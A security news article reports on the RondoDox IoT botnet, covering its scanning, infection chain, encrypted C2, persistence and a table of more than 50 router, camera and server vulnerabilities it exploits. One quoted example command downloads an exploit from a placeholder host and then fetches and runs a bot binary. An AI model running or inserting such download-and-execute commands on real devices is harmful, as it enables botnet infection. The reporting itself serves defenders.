Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.
Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.
In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.
Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.
Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.
The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.
Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.
This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.
Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.
Infection Mechanism
RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.
Once a target is identified, the appropriate exploit payload—drawn from its extensive repository— is delivered.
For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:-
wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.
Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.
Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.
The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.
.webp)
A timeline of the RondoDox vulnerability (Source – Trend Micro)
Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.
Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.
The table below provides a detailed overview of all 50+ vulnerabilities currently exploited by RondoDox, including their CVE identifiers, affected products, impact ratings, required exploit prerequisites, and CVSS 3.1 scores.
| # | Vendor / Product | CVE ID | CWE / Type | Status | Notes |
|---|---|---|---|---|---|
| 1 | Nexxt Router Firmware | CVE-2022-44149 | CWE-78 (Command Injection) | N-Day | |
| 2 | D-Link Routers | CVE-2015-2051 | CWE-78 | N-Day | |
| 3 | Netgear R7000 / R6400 | CVE-2016-6277 | CWE-78 | N-Day | |
| 4 | Netgear (mini_httpd) | CVE-2020-27867 | CWE-78 | N-Day | |
| 5 | Apache HTTP Server | CVE-2021-41773 | CWE-22 (Path Traversal / RCE) | N-Day | |
| 6 | Apache HTTP Server | CVE-2021-42013 | CWE-22 | N-Day | |
| 7 | TBK DVRs | CVE-2024-3721 | CWE-78 | Targeted | |
| 8 | TOTOLINK (setMtknatCfg) | CVE-2025-1829 | CWE-78 | N-Day | |
| 9 | Meteobridge Web Interface | CVE-2025-4008 | CWE-78 | N-Day | |
| 10 | D-Link DNS-320 | CVE-2020-25506 | CWE-78 | N-Day | |
| 11 | Digiever DS-2105 Pro | CVE-2023-52163 | CWE-78 | N-Day | |
| 12 | Netgear DGN1000 | CVE-2024-12847 | CWE-78 | N-Day | |
| 13 | D-Link (multiple) | CVE-2024-10914 | CWE-78 | N-Day | |
| 14 | Edimax RE11S Router | CVE-2025-22905 | CWE-78 | N-Day | |
| 15 | QNAP VioStor NVR | CVE-2023-47565 | CWE-78 | N-Day | |
| 16 | D-Link DIR-816 | CVE-2022-37129 | CWE-78 | N-Day | |
| 17 | GNU Bash (ShellShock) | CVE-2014-6271 | CWE-78 (Code Injection) | N-Day / Historical | |
| 18 | Dasan GPON Home Router | CVE-2018-10561 | CWE-287 (Auth Bypass) | N-Day | |
| 19 | Four-Faith Industrial Routers | CVE-2024-12856 | CWE-78 | N-Day | |
| 20 | TP-Link Archer AX21 | CVE-2023-1389 | CWE-78 | Targeted | |
| 21 | D-Link Routers | CVE-2019-16920 | CWE-78 | N-Day | |
| 22 | Tenda (fromNetToolGet) | CVE-2025-7414 | CWE-78 | N-Day | |
| 23 | Tenda (deviceName) | CVE-2020-10987 | CWE-78 | N-Day | |
| 24 | LB-LINK Routers | CVE-2023-26801 | CWE-78 | N-Day | |
| 25 | Linksys E-Series | CVE-2025-34037 | CWE-78 | N-Day | |
| 26 | AVTECH CCTV | CVE-2024-7029 | CWE-78 | N-Day | |
| 27 | TOTOLINK X2000R | CVE-2025-5504 | CWE-78 | N-Day | |
| 28 | ZyXEL P660HN-T1A | CVE-2017-18368 | CWE-78 | N-Day | |
| 29 | Hytec HWL-2511-SS | CVE-2022-36553 | CWE-78 | N-Day | |
| 30 | Belkin Play N750 | CVE-2014-1635 | CWE-120 (Buffer Overflow) | N-Day | |
| 31 | TRENDnet TEW-411BRPplus | CVE-2023-51833 | CWE-78 | N-Day | |
| 32 | TP-Link TL-WR840N | CVE-2018-11714 | CWE-78 | N-Day | |
| 33 | D-Link DIR820LA1 | CVE-2023-25280 | CWE-78 | N-Day | |
| 34 | Billion 5200W-T | CVE-2017-18369 | CWE-78 | N-Day | |
| 35 | Cisco (multiple products) | CVE-2019-1663 | CWE-119 (Memory Corruption) | N-Day | |
| 36 | TOTOLINK (setWizardCfg) | CVE-2024-1781 | CWE-78 | N-Day | |
| 37 | Hikvision NVR | — | Command Injection | No CVE | Listed by Trend Micro w/o CVE |
| 38 | Dahua DVR | — | Remote Code Execution | No CVE | Listed by Trend Micro w/o CVE |
| 39 | Wavlink Routers | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 40 | ZTE ZXHN Router | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 41 | Seenergy NVR | — | Authentication Bypass | No CVE | Listed by Trend Micro w/o CVE |
| 42 | Uniview NVR | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 43 | TP-Link TD-W8960N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 44 | Dahua IP Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 45 | HiSilicon Firmware | — | Buffer Overflow | No CVE | Listed by Trend Micro w/o CVE |
| 46 | Amcrest Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 47 | Hikvision IP Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 48 | LILIN Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 49 | TP-Link WR941N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 50 | Wavlink WL-WN575A3 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 51 | Dahua NVR | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 52 | Tenda AC6 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 53 | Hikvision DS-7108HGHI | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 54 | LB-LINK BL-WR450H | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 55 | ZTE ZXHN H108N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 56 | Wavlink WL-WN531G3 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
